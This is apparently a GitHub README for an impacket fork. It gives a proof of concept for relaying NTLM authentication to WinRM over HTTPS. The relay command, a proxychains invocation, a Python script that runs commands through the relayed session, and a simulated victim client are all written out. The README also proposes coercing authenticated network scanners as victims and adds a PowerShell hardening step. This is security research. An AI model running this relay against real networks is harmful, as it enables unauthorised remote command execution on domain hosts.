jmk-foofus / impacket
This project forked from fortra/impacket
Impacket is a collection of Python classes for working with network protocols.
Home Page: https://www.coresecurity.com
License: Other
MadSec 2023/12/12 Presentation (YouTube) [37:53]
CypherCon 2024 Overview
The following is a simple proof-of-concept of relaying WinRM with the modified ntlmrelayx tool.
A Ruby script is used to simulate a client connecting to our service and attempting to authenticate. This initial client connection is made using WinRM over HTTP (5985/tcp); in a real-world scenario it would be coerced in some manner. The relay server running ntlmrelayx bounces the connection to the target server using WinRM over HTTPS (5986/tcp) and opens a local SOCKS proxy. The attacker then sends WinRM commands through the SOCKS proxy and abuses the established authenticated session.
The target server is a basic Windows 2019 domain-joined installation with WinRM configured for HTTPS (5986/tcp). The default WinRM channel binding token (CBT) policy in this configuration is "Relaxed", meaning that if the client does not supply a CBT, no anti-relay restrictions are enforced. The WinRM client does not include a CBT, which is what lets the relay work. The target service must be WinRM over HTTPS: the default unencrypted WinRM over HTTP (5985/tcp) encrypts the message body with a key derived from the client's NTLM hash, which the relay does not possess, so the relayed session is unusable and the attack breaks.
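The "Relaxed" default described above is the setting a defender should audit. The following PowerShell is an added example, not part of this repository or of impacket: it reads the WinRM service's channel-binding policy from the WSMan provider and, if desired, raises it to "Strict" so that HTTPS clients that omit a CBT are rejected. The function names are my own; the WSMan path and the None/Relaxed/Strict values are the real ones exposed by the WinRM service configuration.

```powershell
# Added example (not from the impacket fork): audit and harden the WinRM
# service's channel-binding policy. Run in an elevated session on the WinRM
# server. CbtHardeningLevel accepts None, Relaxed (the default) or Strict.

function Get-WinRmCbtPolicy {
    # Hypothetical helper name; the WSMan provider path is real.
    $item = Get-Item -Path 'WSMan:\localhost\Service\Auth\CbtHardeningLevel'
    [pscustomobject]@{
        CbtHardeningLevel = $item.Value
        # Relaxed accepts a client that sends no CBT at all, which is exactly
        # the condition the relay described above depends on.
        RelayResistant    = ($item.Value -eq 'Strict')
    }
}

function Set-WinRmCbtStrict {
    # Hypothetical helper name. Strict makes the HTTPS listener require a CBT
    # that matches the TLS channel, so a relayed NTLM exchange no longer binds.
    Set-Item -Path 'WSMan:\localhost\Service\Auth\CbtHardeningLevel' -Value 'Strict'
    Restart-Service -Name WinRM
}

# Usage: inspect first, then harden if the policy is not already Strict.
$policy = Get-WinRmCbtPolicy
$policy
if (-not $policy.RelayResistant) {
    Set-WinRmCbtStrict
    Get-WinRmCbtPolicy
}
```

Two caveats when rolling this out. Channel binding only exists for TLS listeners, so the setting has no effect on 5985/tcp; that listener is protected by NTLM message encryption instead, as the write-up notes. Built-in Windows clients (winrs, Enter-PSSession) send a CBT over HTTPS and keep working under Strict, but third-party WinRM clients that omit it, including the scanner-style client simulated above, will fail to authenticate to the HTTPS listener until they are updated or moved to Kerberos.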
Relay Target
Client (Coerced Victim)
#!/usr/bin/ruby
require 'winrm'

# Simulated coerced client: authenticates to the relay over WinRM/HTTP (5985/tcp).
opts = {
  endpoint: 'http://192.168.10.30:5985/wsman',
  user: 'DOMAIN\Administrator',
  # Double-quoted so the apostrophe inside the value does not terminate the string.
  password: "TheAccount'sLegitPassword",
}
conn = WinRM::Connection.new(opts)
conn.shell(:powershell) do |shell|
  output = shell.run('hostname') do |stdout, stderr|
    STDOUT.print stdout
    STDERR.print stderr
  end
  puts "The script exited with exit code #{output.exitcode}"
end
ntlmrelayx.py -t "winrms://192.168.10.10" -socks
proxychains winrm-attack.py
#!/usr/bin/python3
import winrm

# Target WinRM/HTTPS listener reached through the ntlmrelayx SOCKS proxy.
host = 'https://192.168.10.10:5986'
domain = 'DOMAIN'
user = 'Administrator'
# The password is never checked: the SOCKS proxy injects the relayed session.
password = 'NotTheRealPassword'

session = winrm.Session(host, auth=('{}@{}'.format(user, domain), password),
                        transport='basic', server_cert_validation='ignore')
result = session.run_ps('hostname')
print(result)
result = session.run_ps('whoami')
print(result)
A potential real world abuse scenario for the WinRM relay has a corporate network scanner as the client. For example, multiple network discovery tools and vulnerability scanners (e.g., Rapid7 Nexpose) use WinRM to "discover" assets. Their documentation further typically guides users to configure the authenticated scans to use privileged domain credentials. A malicious actor simply needs to be running the relay while a network scan is being performed. As many organisations perform nightly or weekly scans, it is reasonable to assume that intercepting a scan is plausible.
IP addresses must be used, as ntlmrelayx appears to have issues resolving hostnames and matching proxy connections.
cmd_hostname.xml.txt
TODO: Add basic KeepAlive. Currently, the SOCKS proxy must be used shortly after the connection is relayed.
Test case: Rapid7 Nexpose configured for a basic authenticated scan against the relay server. 5985/tcp is the only configured scan port, and the scan template is a limited CIS benchmark. The scan appears to send too many requests for ntlmrelayx to track, and the target server's challenges are being applied to the wrong responses. Solving this issue is critical to the attack being useful in the real world.